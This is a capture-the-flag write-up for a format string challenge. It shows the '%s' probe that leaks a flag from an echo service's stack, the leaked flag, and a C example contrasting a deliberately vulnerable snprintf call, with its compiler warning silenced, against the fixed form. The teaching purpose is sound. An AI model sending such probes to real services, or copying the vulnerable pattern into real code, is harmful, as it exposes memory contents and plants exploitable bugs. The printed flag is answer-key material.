Difficulty: easy

Category: pwn

Author: xnull

Description:

### Format String Vulnerability

This program echoes back whatever you type. The flag is stored in memory on the stack.

Can you leak it using a format string vulnerability?

**Access:** Connect to the binary with `ncat --ssl [host] [port]` or use pwntools.

The web interface provides educational content and downloadable source code.

Solution

The service interprets format specifiers in its input, so we can just send a few `%s` and get the flag:

```
===== Echo Service =====
Enter text to echo: %s.%s.%s.%s.%s.%s
You entered: You entered: .(null).(null).%s.%s.%s.%s.%s.%s
.(null).ENDLM{bc006bcea480a4f90ac40d4b5e3ae904bb89eb0343cd5c14}
```

Flag: ENDLM{bc006bcea480a4f90ac40d4b5e3ae904bb89eb0343cd5c14}
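
Why the `%s` probe leaks memory and how the echo call is fixed, as an added example that is not the challenge's source code. The function names are hypothetical and the vulnerable form is only an assumed shape of the bug, since the binary's source is not shown here.

```c
#include <stdio.h>
#include <string.h>

/* Silence the compiler's own warning so the "before" form builds everywhere. */
#pragma GCC diagnostic ignored "-Wformat-security"

/* BEFORE (assumed shape of the bug): input is used as the format string, so
 * every %s / %p / %n in it makes printf-family code fetch an argument that
 * was never passed, i.e. whatever sits in registers and on the stack. */
int echo_vulnerable(char *out, size_t n, const char *input)
{
    return snprintf(out, n, input);
}

/* AFTER: the format is a constant and the input is only ever data. */
int echo_safe(char *out, size_t n, const char *input)
{
    return snprintf(out, n, "%s", input);
}

/* Approximate count of conversion directives in untrusted text ("%%" is a
 * literal percent sign). Usable as a regression check or a log signal. */
size_t count_directives(const char *s)
{
    size_t count = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {       /* escaped percent: skip both characters */
            s++;
            continue;
        }
        if (s[1] != '\0')        /* '%' followed by any other character */
            count++;
    }
    return count;
}

int main(void)
{
    const char *probe = "%s.%s.%s.%s.%s.%s";   /* input from the write-up */
    char buf[64];

    echo_safe(buf, sizeof buf, probe);
    printf("safe echo : %s\n", buf);            /* printed back verbatim */
    printf("directives: %zu\n", count_directives(probe));
    return 0;
}
```

Building with `-Wformat -Wformat-security` (without the pragma) makes GCC and Clang flag the `echo_vulnerable` call at compile time.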